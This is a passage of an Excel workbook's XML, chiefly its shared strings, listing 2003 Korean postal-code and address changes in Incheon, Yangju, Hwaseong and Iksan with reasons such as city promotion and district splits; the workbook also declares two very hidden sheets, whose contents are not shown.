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550" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="10.19종합" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet3" sheetId="3" r:id="rId3"/>
    <sheet name="VXXXXXXX" sheetId="4" state="veryHidden" r:id="rId4"/>
    <sheet name="VXXXXXXX" sheetId="5" state="veryHidden" r:id="rId5"/>
  </sheets>
  <definedNames/>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1213" uniqueCount="627">
  <si>
    <t>익산시 창인2가동 1~111번지</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>창인동2가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 1~111번지</t>
    </r>
  </si>
  <si>
    <t>익산시 창인2가동 112</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>창인동2가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 112</t>
    </r>
  </si>
  <si>
    <t>익산시 창인2가동 113~723</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>창인동2가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 113~723</t>
    </r>
  </si>
  <si>
    <r>
      <t>광주시 오포읍 신현리</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 
현대모닝사이드1차아파트(101-206동)</t>
    </r>
  </si>
  <si>
    <t>용인시 구성읍 
무등LG2차아파트(101-107동)</t>
  </si>
  <si>
    <r>
      <t>광주시 오포읍 신현리 
현대1차아파트</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>(101-105돟)</t>
    </r>
  </si>
  <si>
    <r>
      <t>광주시 오포읍 신현리 
현대2차아파트</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>(201-205동)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">광주시 오포읍 신현리 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>현대모닝사이드2차아파트(101-105동)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">용인시 구성읍 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>마북리</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 
무등LG2차아파트(101-107동)</t>
    </r>
  </si>
  <si>
    <t>수원시 장안구 천천동 
성균관대학교자연과학캠퍼스</t>
  </si>
  <si>
    <t>양주시 덕계동</t>
  </si>
  <si>
    <t>시·도</t>
  </si>
  <si>
    <t>우편번호</t>
  </si>
  <si>
    <t>우편번호 일부조정 내역</t>
  </si>
  <si>
    <t>조정(2003.9.19현재).xls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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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시행일 : 2003.10.19</t>
  </si>
  <si>
    <t>조정(2003.10.19현재).xls</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍2리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍3리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍4리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍5리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍6리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍7리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍8리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍9리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍10리</t>
  </si>
  <si>
    <t>포천군 포천읍 신읍11리</t>
  </si>
  <si>
    <t>수원시 장안구 천천동 성균관대학교</t>
  </si>
  <si>
    <t>명칭변경</t>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동2가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 5~339번지</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동2가</t>
    </r>
  </si>
  <si>
    <t>익산시 중앙2가동</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>중앙동2가</t>
    </r>
  </si>
  <si>
    <t>익산시 중앙3가동</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>중앙동3가</t>
    </r>
  </si>
  <si>
    <t>익산시 창인2가동</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>창인동2가</t>
    </r>
  </si>
  <si>
    <t>현         재</t>
  </si>
  <si>
    <t>변         경</t>
  </si>
  <si>
    <t>비    고
(변경사유)</t>
  </si>
  <si>
    <t>지   역   명</t>
  </si>
  <si>
    <t>인천</t>
  </si>
  <si>
    <t>계양구 계산3동 1014∼1058</t>
  </si>
  <si>
    <t>추가</t>
  </si>
  <si>
    <t>인천 계양구 계산3동 1059~1086</t>
  </si>
  <si>
    <t>계양구 계산3동 1064∼1072</t>
  </si>
  <si>
    <t>지번변경</t>
  </si>
  <si>
    <t>계양구 계산3동 1088</t>
  </si>
  <si>
    <t>계양구 계산3동 계양경찰서</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">계양구 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 계양경찰서</t>
    </r>
  </si>
  <si>
    <t>분동</t>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <t>계양구 계산3동 계양구청</t>
  </si>
  <si>
    <r>
      <t>계양구</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 계양구청</t>
    </r>
  </si>
  <si>
    <t>계양구 계산3동 계양등기소</t>
  </si>
  <si>
    <r>
      <t>계양구</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 계양등기소</t>
    </r>
  </si>
  <si>
    <t>계양구 계산3동 북부지방노동사무소</t>
  </si>
  <si>
    <r>
      <t>계양구</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 북부지방노동사무소</t>
    </r>
  </si>
  <si>
    <t>계양구 계산3동 은행마을아파트</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">계양구 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 은행마을아파트</t>
    </r>
  </si>
  <si>
    <t>계양구 계산3동 인천계양우체국</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">계양구 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 인천계양우체국</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">계양구 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 1059∼1063번지</t>
    </r>
  </si>
  <si>
    <t>추가</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">계양구 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 1073∼1087</t>
    </r>
  </si>
  <si>
    <r>
      <t>계양구</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 1089∼1108</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">계양구 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>계산4동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 기타(계산4동)</t>
    </r>
  </si>
  <si>
    <t>경기</t>
  </si>
  <si>
    <t>명칭변경</t>
  </si>
  <si>
    <t>용인시 상현동 두산웨이브아파트</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">용인시 상현동 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>두산위브아파트</t>
    </r>
  </si>
  <si>
    <t>리명삽입</t>
  </si>
  <si>
    <t>화성시 우정면을</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>으로</t>
    </r>
  </si>
  <si>
    <t>읍승격</t>
  </si>
  <si>
    <t>화성시 우정면 기아생활관</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">우정읍 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>기아생활관</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 기아1차아파트(101-104동)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 기아1차아파트(101-104동)</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 기아2차아파트(201-204동)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 기아2차아파트(201-204동)</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 기아자동차㈜화성공장</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">우정읍 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>기아자동차㈜화성공장</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 국화리</t>
  </si>
  <si>
    <r>
      <t>화성시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 국화리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 매향리</t>
  </si>
  <si>
    <r>
      <t>화성시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 매향리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 멱우리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 멱우리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 석천리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 석천리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 운평리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">우정읍 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>운평리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 원안리</t>
  </si>
  <si>
    <r>
      <t>화성시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> 우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 원안리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 이화리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 이화리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 조암리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">우정읍 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>조암리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 주곡리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 주곡리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 한각리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">우정읍 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>한각리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 호곡리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 호곡리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 화산리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 화산리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면 화수리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 화수리</t>
    </r>
  </si>
  <si>
    <t>화성시 우정면</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">화성시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>우정읍</t>
    </r>
  </si>
  <si>
    <t>양주군 양주읍</t>
  </si>
  <si>
    <t>삭제</t>
  </si>
  <si>
    <t>양주군 회천읍</t>
  </si>
  <si>
    <t>양주군 회천읍 고암리</t>
  </si>
  <si>
    <t>양주시 고암동</t>
  </si>
  <si>
    <t>동신설</t>
  </si>
  <si>
    <t>양주군 양주읍 고읍리</t>
  </si>
  <si>
    <t>양주시 고읍동</t>
  </si>
  <si>
    <t>양주군 양주읍 광사리</t>
  </si>
  <si>
    <t>양주시 광사동</t>
  </si>
  <si>
    <t>양주군 양주읍 남방1,4리</t>
  </si>
  <si>
    <t>양주시 남방동</t>
  </si>
  <si>
    <t>양주군 양주읍 남방2~3리</t>
  </si>
  <si>
    <t>양주군 양주읍 양주군청</t>
  </si>
  <si>
    <t>양주시 남방동  양주시청</t>
  </si>
  <si>
    <t>시승격</t>
  </si>
  <si>
    <t>양주군 회천읍 덕계 1∼14리</t>
  </si>
  <si>
    <t>482851-482853</t>
  </si>
  <si>
    <t>양주군 회천읍 금융아파트</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕계동 금융아파트</t>
    </r>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <t>양주군 회천읍 명성아파트</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕계동 명성아파트</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 삼희아파트</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕계동 삼희아파트</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 신우아파트</t>
  </si>
  <si>
    <r>
      <t>양주시 덕계동</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신우아파트</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 정안빌라</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕계동 정안빌라</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 한주아파트</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>덕계동 한주아파트</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 현대아파트</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕계동 현대아파트</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 덕정1~7리</t>
  </si>
  <si>
    <t>482854-482855</t>
  </si>
  <si>
    <t>양주시 덕정동</t>
  </si>
  <si>
    <t>동신설</t>
  </si>
  <si>
    <t>양주군 회천읍 덕정주공1단지(101-110동)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>덕정동 주공1단지(101-110동)</t>
    </r>
  </si>
  <si>
    <t>시승격</t>
  </si>
  <si>
    <t>양주군 회천읍 덕정주공2단지(201-220동)</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕정동 주공2단지(201-220동)</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 덕정주공3단지(301-313동)</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕정동 주공3단지(301-313동)</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 덕정주공4단지(401-412동)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>덕정동 주공4단지(401-412동)</t>
    </r>
  </si>
  <si>
    <t>양주군 회천읍 덕정주공5단지(501-520동)</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 덕정동 주공5단지(501-520동)</t>
    </r>
  </si>
  <si>
    <t>양주군 양주읍 마전리</t>
  </si>
  <si>
    <t>양주시 마전동</t>
  </si>
  <si>
    <t>양주군 양주읍 만송1∼2리</t>
  </si>
  <si>
    <t>양주시 만송동</t>
  </si>
  <si>
    <t>양주군 양주읍 만송3리</t>
  </si>
  <si>
    <t>양주군 회천읍 봉양리</t>
  </si>
  <si>
    <t>양주시  봉양동</t>
  </si>
  <si>
    <t>양주군 양주읍 산북리</t>
  </si>
  <si>
    <t>양주시 산북동</t>
  </si>
  <si>
    <t>양주군 양주읍 삼숭리</t>
  </si>
  <si>
    <t>양주시 삼숭동</t>
  </si>
  <si>
    <t>양주군 양주읍 어둔리</t>
  </si>
  <si>
    <t>양주시 어둔동</t>
  </si>
  <si>
    <t>양주군 회천읍 옥정1~3리</t>
  </si>
  <si>
    <t>482851 
482857</t>
  </si>
  <si>
    <t>양주시 옥정동</t>
  </si>
  <si>
    <t>양주군 양주읍 유양리</t>
  </si>
  <si>
    <t>양주시 유양동</t>
  </si>
  <si>
    <t>양주군 회천읍 율정리</t>
  </si>
  <si>
    <t>양주시 율정동</t>
  </si>
  <si>
    <t>양주군 회천읍 회암리</t>
  </si>
  <si>
    <t>양주시 회암동</t>
  </si>
  <si>
    <t>양주군 회천읍 회정리</t>
  </si>
  <si>
    <t>양주시 회정동</t>
  </si>
  <si>
    <t>양주군 백석읍을</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍으로</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 가업리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍 가업리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 기산리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>백석읍 기산리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 방성1∼2리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍 방성1∼2리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 방성3∼4리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍 방성3∼4리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 방성 5리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍 방성 5리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 복지리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">양주시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>백석읍 복지리</t>
    </r>
  </si>
  <si>
    <t>양주군 백석읍 연곡리</t>
  </si>
  <si>
    <r>
      <t>양주시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 백석읍 연곡리</t>
    </r>
  </si>
  <si>
